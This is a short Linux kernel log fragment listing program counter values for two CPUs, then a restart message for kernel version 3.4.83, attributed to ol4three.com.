[ 145.623168] CPU0 PC (9) : 0xc003ee54
[ 145.627227] CPU1 PC (0) : 0xc0019b2c
[ 145.631408] CPU1 PC (1) : 0xc0019b2c
[ 145.635467] CPU1 PC (2) : 0xc0019b2c
[ 145.639495] CPU1 PC (3) : 0xc0019b2c
[ 145.643707] CPU1 PC (4) : 0xc0019b2c
[ 145.647766] CPU1 PC (5) : 0xc0019b2c
[ 145.651824] CPU1 PC (6) : 0xc0019b2c
[ 145.656005] CPU1 PC (7) : 0xc0019b2c
[ 145.660064] CPU1 PC (8) : 0xc0019b2c
[ 145.664123] CPU1 PC (9) : 0xc0019b2c
[ 145.668182]
[ 145.669952] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[ 145.669982]

FROM :ol4three.com | Author:ol4three
